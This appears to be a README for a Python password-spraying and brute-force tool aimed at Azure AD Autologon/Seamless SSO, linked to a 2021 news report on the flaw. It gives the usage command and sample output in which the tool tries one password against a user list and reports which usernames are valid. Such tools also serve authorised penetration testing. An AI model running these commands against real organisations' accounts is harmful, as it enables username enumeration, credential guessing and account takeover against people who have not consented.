Brute force attack tool for Azure AD Autologon/Seamless SSO - Source: https://arstechnica.com/information-technology/2021/09/new-azure-active-directory-password-brute-forcing-flaw-has-no-fix/
Brute force attack tool for Azure AD Autologon
The AADSTS81016 that people were reporting now seems to indicate a valid account.
Thanks to @rootsecdev for validating that password spray functionality still works!
Usage:
python3 azuread_autologon_brute.py -d intranet.directory -U users.txt -p Password1
[~/AzureAD_Autologon_Brute] # python3 azuread_autologon_brute.py -d intranet.directory -U users.txt -p Password1
Domain is intranet.directory
Setting password as: Password1
Reading users from file: users.txt
+-----------------------------------------+
| AzureAD AutoLogon Brute |
| 2021.09.30 @nyxgeek - TrustedSec |
+-----------------------------------------+
[-] Username not found:[email protected]:Password1
[+] VALID USERNAME, invalid password :[email protected]:Password1
[-] Username not found:[email protected]:Password1
[-] Username not found:[email protected]:Password1
[-] Username not found:[email protected]:Password1
[-] Username not found:[email protected]:Password1
[+] VALID USERNAME, invalid password :[email protected]:Password1
[-] Username not found:[email protected]:Password1
[+] VALID USERNAME, invalid password :[email protected]:Password1
[-] Username not found:[email protected]:Password1